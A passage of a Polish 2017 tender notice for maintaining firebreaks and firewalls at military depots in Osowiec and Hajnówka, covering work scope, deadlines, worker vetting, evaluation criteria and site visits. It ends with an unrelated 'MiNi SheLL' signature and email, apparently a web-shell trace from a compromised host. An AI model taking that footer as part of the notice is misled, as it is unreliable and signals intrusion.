a.	orkę ciągnikiem z pługiem przyczepnym na głębokości 25-30 cm                         i przebronowanie broną talerzową, a w miejscach niedostępnych pas należy przeorać glebogryzarką ręczną,
b.	przeorany pas należy oczyścić z chwastów, samosiej i zalegających gałęzi, które Wykonawca wywozi na własny koszt,
c.	usuwanie wszelkiej wrastającej roślinności, chwastów i samosiejek                     z całej powierzchni ogrodzeń usytuowanych na pasach przeciwpożarowych.
d.	wykonanie oprysków wzdłuż ogrodzenia obwodnicy po każdym wykonanym zabiegu pielęgnacyjnym
4.	Częstotliwość wykonywania zabiegów:
I etap w terminie - do 05.06.2017r.
II etap w terminie  od 01.07.2017r. 15.07.2017r.
III etap w terminie - od 01.08.2017r. do 15.08.2017r.
IV etap w terminie - od 15.09.2017r. do 30.09.2017r.

Zamawiający informuje, że nie wymaga określonych cech usługi, dotyczących dostosowania usługi do potrzeb wszystkich użytkowników                     z uwzględnieniem wymagań w zakresie dostępności dla osób niepełnosprawnych w nawiązaniu do art. 30 ust. 9 pkt 1 i niniejszej treści SIWZ.
Przedmiotem zamówienia jest usługa pielęgnacji pasów ppoż. i wałów przeciwpożarowych na terenach wojskowych administrowanych przez 25 WOG.
Usługa została podzielona na trzy części:
Część II
Pielęgnacja pasów przeciwpożarowych  rejon Skład Osowiec.
Warunki ogólne
Pasy i wały przeciwpożarowe na dzień odbioru muszą być oczyszczone                      z gałęzi, samosiejek, wykoszonych lub wyoranych traw, wrzosów itp..
Pielęgnacja pasów musi być wykonana poprzez orkę ciągnikiem z pługiem przyczepnym na głębokości 25-30 cm i przebronowanie broną talerzową. 
W miejscach niedostępnych dla ciągnika rolniczego pasy należy zmineralizować glebogryzarką ręczną. 
Szczegółowy zakres robót oraz ich częstotliwość określona została dla każdej części usługi w szczegółowym zakresie działania odrębnie, z uwagi 
na specyfikę przyrodniczą kompleksów.
Upoważniony przedstawiciel Zamawiającego lub osoba przez niego wyznaczona wskaże Wykonawcy miejsce realizacji usługi.
Wykonawca przed przystąpieniem do realizacji usługi dostarcza 
do Infrastruktury 25 WOG listę pracowników i wykaz sprzętu uczestniczącego 
w  zadaniu. 
5.	Zamawiający na podstawie art. 29 ust. 3a ustawy wymaga zatrudnienia przez Wykonawcę lub Podwykonawcę na podstawie umowy o pracę zgodnie z ustawą z dn. 26 czerwca 1974 r.  Kodeks pracy (Dz. U. z 2014 r, poz. 1502 ze zm.), zawartej na czas realizacji zamówienia co najmniej 1 osoby wykonującej w szczególności czynności: koszenie, wycinanie, rekultywacja przy czym: 
       Wymagania dotyczące zatrudnienia osób uczestniczących w realizacji zamówienia na podstawie umowy o pracę
5a)	rodzaj czynności osób realizujących zamówienie, do których ma zastosowanie obowiązek zatrudnienia na umowę o pracę:
5b)	Dokumentowanie zatrudnienia osób o których mowa w pkt. 5a) przez 
             Wykonawcę/Podwykonawcę na umowę o pracę:
5.1	Oświadczenie zawierające wykaz osób, o których mowa w pkt. 5a) (załącznik nr 7), z którymi zawarto umowę o pracę.
5.2	Termin na dostarczenie powyższego dokumentu:
a)	3 dni robocze od  dnia podpisania umowy;
b)	3 dni robocze po dokonaniu zmiany pracownika w trakcie realizacji zamówienia;
c)	 Sposób prowadzenia kontroli przez Zamawiającego w zakresie spełniana warunku zatrudnienia osób na umowę o pracę, o których mowa w art. 29 ust. 3a ustawy pzp:
Zgodnie z projektem umowy, który stanowi załącznik do siwz.
d)	Sankcje za naruszenie obowiązku zatrudnienia osób na umowę o pracę wykonujących czynności, o których mowa wyszczególnione są  w zapisach projektu umowy załącznik do siwz.

	Wykonawca/Podwykonawca zatrudniający obcokrajowców, przed rozpoczęciem przez nich prac, ma obowiązek zgłoszenia ich do Służby Kontrwywiadu Wojskowego zgodnie Decyzją Nr 19 Ministra Obrony Narodowej z dnia 24.01.2017 roku w sprawie organizowania współpracy międzynarodowej                    w resorcie obrony narodowej (Dz. Urz. MON poz. 18). Po uzyskaniu stosownego zezwolenia wydanego przez Służbę Kontrwywiadu Wojskowego, Wykonawca/Podwykonawca ma obowiązek przedstawić niezwłocznie dokument Zamawiającemu. 
Wykonawca robót w pełni odpowiada za bezpieczeństwo i higienę pracy                       w miejscu realizacji robót oraz zachowanie bezpieczeństwa pożarowego.
Pracownicy Wykonawcy przed przystąpieniem do realizacji usługi zostaną zapoznani przez przedstawiciela Użytkownika lub osobę przez niego upoważnioną z uregulowaniami dotyczącymi wstępu na obszar chroniony,                         z systemem przepustkowym, zakazami lub nakazami obowiązującymi na danym terenie, w tym używania telefonów komórkowych, wykonywania zdjęć, przyjmowania interesantów itp.  
Przed rozpoczęciem robót wszyscy pracownicy realizujący usługę na terenie kompleksów wojskowych 2RBLog w Składach Hajnówka i Osowiec powinni okazać zaświadczenie o aktualnym szkoleniu w zakresie informacji niejawnych, zgodnie z Ustawą z 05 sierpnia 2010 rok o ochronie informacji niejawnych, zgodnie z Ustawą z 05 sierpnia 2010r. o ochronie informacji niejawnych (Dz.U. z 2016r.  poz.1167 t.j.). W przypadku braku zaświadczenia o szkoleniu                         z zakresu ochrony informacji niejawnych zostanie ono przeprowadzone przez Pełnomocnika Ochrony Informacji Niejawnych 2RBLog lub osobę przez niego upoważnioną. Szkolenie przeprowadzone będzie bezpłatnie.
Terminy przeprowadzenia zabiegów określono szczegółowo w każdej części zadania. Wykonana usługa musi być potwierdzona protokołem odbioru.  Brak zatwierdzonego protokołu będzie równoznaczny z niewykonaniem usługi. Protokół odbioru usługi z każdego zabiegu jest załącznikiem do faktury VAT wystawionej przez Wykonawcę. Wyszczególnione w opisie przedmiotu zamówienia czynności Wykonawca zamówienia wykonuje na własny koszt. Wykonawca ma obowiązek zachować w tajemnicy wszelkie informacje uzyskane w czasie pracy.
Usługi powinny być zrealizowane zgodnie z obowiązującymi normami branżowymi, przepisami ochrony środowiska i bez stworzenia zagrożeń dla zdrowia ludzi.
Przewiduję się wizję lokalną w celu oszacowania stopnia trudności i warunków realizacji zadania.
<br /><b>2) Wspólny Słownik Zamówień (CPV): </b>75251120-7<br /><b>3) Wartość części zamówienia (jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br />
                  Wartość bez VAT:
                  <br />
                  Waluta:
                  <br /><div style="padding-left: 20px"><br /><b>4) Czas trwania lub termin wykonania: </b>
                      data zakończenia: 30/09/2017<br /><b>5) Kryteria oceny ofert: </b><table style="padding-left: 20px"><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>CENA</td><td>60</td></tr><tr><td>TERMIN PŁATNOŚCI</td><td>40</td></tr></table><b>
                      6) INFORMACJE DODATKOWE:
                    </b>Przystępując do postępowania każdy z Wykonawców zobowiązany jest do wniesienia wadium w wysokości: 
CZĘŚĆ 2- 2.000,00 zł (słownie: dwa tysiące złotych 00/100). 
WIZJA LOKALNA:
Termin wizji lokalnej zostaje wyznaczony na dzień:
	Część II- Rejon Skład Osowiec- 28.04.2017r. o godz. 11:00. 
Osoba do kontaktu Tadeusz JANCZYŁO tel.261 38 61 06
Należy stawić się najpóźniej na 5 minut przed przeprowadzeniem wizji. 
Zebranie o którym mowa powyżej, nie jest zebraniem wykonawców                         o którym mowa w art. 38 ust. 3 ustawy Pzp.
Wszelkie merytoryczne zapytania, które nasuną się w trakcie jak i po zebraniu wykonawców należy kierować do Zamawiającego zachowując formę pisemną na adres e-mail: 25wog.kancelaria@ron.mil.pl lub fax: 261 39 88 13.

<br /></div></div><br /></div><div><b>Część nr: </b>3
                  
                <b>Nazwa: </b> Część III  Pielęgnacja wałów przeciwpożarowych  rejon Skład Hajnówka.<br /><div style="padding-left: 20px"><b>
                    1) Krótki opis przedmiotu zamówienia </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>Każdorazowe wejście na teren kompleksu wojskowego Wykonawca ma obowiązek uzgodnić z Kierownikiem Grupy Zabezpieczenia Hajnówka.
2.	Rodzaj prac do wykonania: 
Koszenie trawy na wałach przeciwpożarowych budynków magazynowych                  o łącznej powierzchni 6,875 ha.
Wały przeciwpożarowe zostaną wskazane Wykonawcy przed przystąpieniem do realizacji umowy.
3. Zakres usługi obejmuje:
a.	koszenie wałów do granic pasów ppoż. poszczególnych budynków,
b.	wygrabienie skoszonej trawy i wywiezienie jej na koszt Wykonawcy,
c.	uprzątnięcie podjazdów i opasek wokół budynków po koszeniu.
4.	Częstotliwość wykonywania zabiegów  trzy razy w roku:
I etap w terminie - do 05.06.2017r.
II etap w terminie  od 01.07.2017r. do 20.07.2017r.
III etap w terminie - od 10.09.2017r. do 20.09.2017r.

Zamawiający informuje, że nie wymaga określonych cech usługi, dotyczących dostosowania usługi do potrzeb wszystkich użytkowników                     z uwzględnieniem wymagań w zakresie dostępności dla osób niepełnosprawnych w nawiązaniu do art. 30 ust. 9 pkt 1 i niniejszej treści SIWZ.
Przedmiotem zamówienia jest usługa pielęgnacji pasów ppoż. i wałów przeciwpożarowych na terenach wojskowych administrowanych przez 25 WOG.

Część III
Pielęgnacja wałów przeciwpożarowych  rejon Skład Hajnówka.
Warunki ogólne
Pasy i wały przeciwpożarowe na dzień odbioru muszą być oczyszczone                      z gałęzi, samosiejek, wykoszonych lub wyoranych traw, wrzosów itp..
Pielęgnacja pasów musi być wykonana poprzez orkę ciągnikiem z pługiem przyczepnym na głębokości 25-30 cm i przebronowanie broną talerzową. 
W miejscach niedostępnych dla ciągnika rolniczego pasy należy zmineralizować glebogryzarką ręczną. 
Szczegółowy zakres robót oraz ich częstotliwość określona została dla każdej części usługi w szczegółowym zakresie działania odrębnie, z uwagi 
na specyfikę przyrodniczą kompleksów.
Upoważniony przedstawiciel Zamawiającego lub osoba przez niego wyznaczona wskaże Wykonawcy miejsce realizacji usługi.
Wykonawca przed przystąpieniem do realizacji usługi dostarcza 
do Infrastruktury 25 WOG listę pracowników i wykaz sprzętu uczestniczącego 
w  zadaniu. 
5.	Zamawiający na podstawie art. 29 ust. 3a ustawy wymaga zatrudnienia przez Wykonawcę lub Podwykonawcę na podstawie umowy o pracę zgodnie z ustawą z dn. 26 czerwca 1974 r.  Kodeks pracy (Dz. U. z 2014 r, poz. 1502 ze zm.), zawartej na czas realizacji zamówienia co najmniej 1 osoby wykonującej w szczególności czynności: koszenie, wycinanie, rekultywacja przy czym: 
       Wymagania dotyczące zatrudnienia osób uczestniczących w realizacji zamówienia na podstawie umowy o pracę
5a)	rodzaj czynności osób realizujących zamówienie, do których ma zastosowanie obowiązek zatrudnienia na umowę o pracę:
5b)	Dokumentowanie zatrudnienia osób o których mowa w pkt. 5a) przez 
             Wykonawcę/Podwykonawcę na umowę o pracę:
5.1	Oświadczenie zawierające wykaz osób, o których mowa w pkt. 5a) (załącznik nr 7), z którymi zawarto umowę o pracę.
5.2	Termin na dostarczenie powyższego dokumentu:
a)	3 dni robocze od  dnia podpisania umowy;
b)	3 dni robocze po dokonaniu zmiany pracownika w trakcie realizacji zamówienia;
c)	 Sposób prowadzenia kontroli przez Zamawiającego w zakresie spełniana warunku zatrudnienia osób na umowę o pracę, o których mowa w art. 29 ust. 3a ustawy pzp:
Zgodnie z projektem umowy, który stanowi załącznik do siwz.
d)	Sankcje za naruszenie obowiązku zatrudnienia osób na umowę o pracę wykonujących czynności, o których mowa wyszczególnione są  w zapisach projektu umowy załącznik do siwz.

	Wykonawca/Podwykonawca zatrudniający obcokrajowców, przed rozpoczęciem przez nich prac, ma obowiązek zgłoszenia ich do Służby Kontrwywiadu Wojskowego zgodnie Decyzją Nr 19 Ministra Obrony Narodowej z dnia 24.01.2017 roku w sprawie organizowania współpracy międzynarodowej                    w resorcie obrony narodowej (Dz. Urz. MON poz. 18). Po uzyskaniu stosownego zezwolenia wydanego przez Służbę Kontrwywiadu Wojskowego, Wykonawca/Podwykonawca ma obowiązek przedstawić niezwłocznie dokument Zamawiającemu. 
Wykonawca robót w pełni odpowiada za bezpieczeństwo i higienę pracy                       w miejscu realizacji robót oraz zachowanie bezpieczeństwa pożarowego.
Pracownicy Wykonawcy przed przystąpieniem do realizacji usługi zostaną zapoznani przez przedstawiciela Użytkownika lub osobę przez niego upoważnioną z uregulowaniami dotyczącymi wstępu na obszar chroniony,                         z systemem przepustkowym, zakazami lub nakazami obowiązującymi na danym terenie, w tym używania telefonów komórkowych, wykonywania zdjęć, przyjmowania interesantów itp.  
Przed rozpoczęciem robót wszyscy pracownicy realizujący usługę na terenie kompleksów wojskowych 2RBLog w Składach Hajnówka i Osowiec powinni okazać zaświadczenie o aktualnym szkoleniu w zakresie informacji niejawnych, zgodnie z Ustawą z 05 sierpnia 2010 rok o ochronie informacji niejawnych, zgodnie z Ustawą z 05 sierpnia 2010r. o ochronie informacji niejawnych (Dz.U. z 2016r.  poz.1167 t.j.). W przypadku braku zaświadczenia o szkoleniu  z zakresu ochrony informacji niejawnych zostanie ono przeprowadzone przez Pełnomocnika Ochrony Informacji Niejawnych 2RBLog lub osobę przez niego upoważnioną. Szkolenie przeprowadzone będzie bezpłatnie.
Terminy przeprowadzenia zabiegów określono szczegółowo w każdej części zadania. Wykonana usługa musi być potwierdzona protokołem odbioru.  Brak zatwierdzonego protokołu będzie równoznaczny z niewykonaniem usługi. Protokół odbioru usługi z każdego zabiegu jest załącznikiem do faktury VAT wystawionej przez Wykonawcę. Wyszczególnione w opisie przedmiotu zamówienia czynności Wykonawca zamówienia wykonuje na własny koszt. Wykonawca ma obowiązek zachować w tajemnicy wszelkie informacje uzyskane w czasie pracy.
Usługi powinny być zrealizowane zgodnie z obowiązującymi normami branżowymi, przepisami ochrony środowiska i bez stworzenia zagrożeń dla zdrowia ludzi.
Przewiduję się wizję lokalną w celu oszacowania stopnia trudności i warunków realizacji zadania.
<br /><b>2) Wspólny Słownik Zamówień (CPV): </b>75251120-7<br /><b>3) Wartość części zamówienia (jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br />
                  Wartość bez VAT:
                  <br />
                  Waluta:
                  <br /><div style="padding-left: 20px"><br /><b>4) Czas trwania lub termin wykonania: </b>
                      data zakończenia: 20/09/2017<br /><b>5) Kryteria oceny ofert: </b><table style="padding-left: 20px"><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>CENA </td><td>60</td></tr><tr><td>TERMIN PŁATNOŚCI</td><td>40</td></tr></table><b>
                      6) INFORMACJE DODATKOWE:
                    </b>Przystępując do postępowania każdy z Wykonawców zobowiązany jest do wniesienia wadium w wysokości: 
CZĘŚĆ 3- 1.500,00 zł (słownie: jeden tysiąc, pięćset złotych 00/100). 
WIZJA LOKALNA:
Termin wizji lokalnej zostaje wyznaczony na dzień:
	Część III- Rejon Skład Hajnówka- 28.04.2017r. o godz. 12:00. 
Osoba do kontaktu Paweł PATEJUK tel. 261 398 032
Należy stawić się najpóźniej na 5 minut przed przeprowadzeniem wizji. 
Zebranie o którym mowa powyżej, nie jest zebraniem wykonawców                         o którym mowa w art. 38 ust. 3 ustawy Pzp.
Wszelkie merytoryczne zapytania, które nasuną się w trakcie jak i po zebraniu wykonawców należy kierować do Zamawiającego zachowując formę pisemną na adres e-mail: 25wog.kancelaria@ron.mil.pl lub fax: 261 39 88 13.
<br /></div></div><br /></div></div>

Creat By MiNi SheLL
Email: jattceo@gmail.com